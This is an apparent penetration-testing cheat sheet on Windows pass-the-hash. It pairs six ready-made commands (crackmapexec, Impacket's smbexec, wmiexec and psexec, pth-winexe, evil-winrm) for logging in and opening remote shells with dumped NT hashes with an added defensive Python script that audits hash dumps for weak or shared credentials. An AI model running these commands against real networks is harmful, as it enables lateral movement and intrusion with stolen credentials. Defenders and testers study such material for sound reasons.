
Pass the Hash

Overview

Having dumped the SAM or LSA, we now hold hashes for domain or local users. Use the hash with crackmapexec to pass it around the network and see whether that credential logs us into any other target(s).

Anatomy of a Windows Hash

username:SID:LM_HASH:NT_HASH::
  • The LM hash is stored for backward compatibility
  • The NT hash is used when authenticating to a server by IP address or an unregistered hostname
  • Otherwise, Kerberos is likely going to be used
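The field layout above is what secretsdump/pwdump-style tools emit. As an added example (not part of the original page), the Python below parses those lines and flags the three conditions a defender reviewing such a dump should act on: accounts that still store a real LM hash, accounts with a blank password, and accounts sharing one NT hash (the same local administrator password on several hosts is exactly what makes passing a SAM hash around the network succeed). The two constants are the well-known LM and NT hashes of the empty password; the sample dump and every hash value in it are constructed for the demonstration.

```python
"""Parse pwdump-style hash lines and flag the conditions that make
pass-the-hash worthwhile to an attacker (and worth fixing for a defender)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Well-known constants: the LM and NT hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of a blank password
HEX32 = re.compile(r"^[0-9a-f]{32}$")


@dataclass
class HashEntry:
    username: str
    rid: int        # the page labels this field SID; pwdump-style output carries the numeric RID
    lm_hash: str
    nt_hash: str

    @property
    def lm_stored(self) -> bool:
        # A real LM hash means the password is also stored in the weak LM form.
        return self.lm_hash != EMPTY_LM

    @property
    def blank_password(self) -> bool:
        return self.nt_hash == EMPTY_NT


def parse_line(line: str) -> HashEntry:
    """Parse one 'user:rid:lm:nt:::' line; raise ValueError on anything malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"expected at least 4 colon-separated fields: {line!r}")
    username, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
    if not username or not rid.isdigit():
        raise ValueError(f"bad username or RID: {line!r}")
    if not HEX32.match(lm) or not HEX32.match(nt):
        raise ValueError(f"LM/NT fields must be 32 hex characters: {line!r}")
    return HashEntry(username, int(rid), lm, nt)


def parse_dump(text: str) -> List[HashEntry]:
    """Parse a whole dump, skipping blank lines."""
    return [parse_line(ln) for ln in text.splitlines() if ln.strip()]


def audit(text: str) -> Dict[str, object]:
    """Return the accounts a defender should look at first."""
    entries = parse_dump(text)
    by_nt: Dict[str, List[str]] = {}
    for e in entries:
        by_nt.setdefault(e.nt_hash, []).append(e.username)
    return {
        "lm_stored": [e.username for e in entries if e.lm_stored],
        "blank_password": [e.username for e in entries if e.blank_password],
        # The same NT hash on several accounts means one credential opens all of them.
        "shared_nt_hash": {h: users for h, users in by_nt.items() if len(users) > 1},
    }


# Constructed sample dump: hash values are made up, not from any real system.
SAMPLE_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for finding, value in audit(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```

Running it on the constructed dump reports svc_backup as still storing an LM hash, Guest as having a blank password, and Administrator and svc_backup as sharing one NT hash; a malformed line raises ValueError rather than being silently skipped.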


Attack 1: crackmapexec --local-auth

Assumes you have the NTLM hash of a local user from the SAM database.

crackmapexec smb <target-or-CIDR> -u "username" -H NT_HASH --local-auth


Attack 2: smbexec.py

smbexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target'


Attack 3: wmiexec.py

wmiexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe 


Attack 4: psexec.py

Assumes you have the NTLM hash of a local user from the SAM database. Also assumes the local user has SMB write access to a share on the target.

psexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe


Attack 5: pth-winexe

pth-winexe -U 'domain.tld/username%lm-hash:nt-hash' cmd.exe


Attack 6: WinRM

  • WinRM over HTTP – TCP/5985
  • WinRM over HTTPS – TCP/5986

Evil WinRM on Attack Box

evil-winrm -i <target_ip> -u username -H <hash>